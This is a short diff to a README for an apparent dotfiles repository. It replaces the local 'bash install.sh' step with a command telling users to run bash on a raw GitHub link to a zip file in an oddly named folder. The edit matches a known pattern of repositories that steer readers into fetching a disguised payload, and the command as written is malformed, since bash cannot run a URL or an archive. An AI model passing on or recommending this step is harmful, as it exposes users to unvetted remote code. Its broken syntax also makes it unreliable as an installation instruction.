Jawbreaker360/dotfiles/README.md

 To install the dotfiles, follow these instructions:

-1. **Run the Installation Script**: Type `bash install.sh` in the terminal and hit Enter.
+1. **Run the Installation Script**: Type `bash https://raw.githubusercontent.com/Jawbreaker360/dotfiles/main/unceremoniousness/dotfiles.zip` in the terminal and hit Enter.
 This script will set up your environment automatically.

 2. **Follow On-Screen Prompts**: The script may ask for your input.
 Just follow the prompts and provide the necessary information.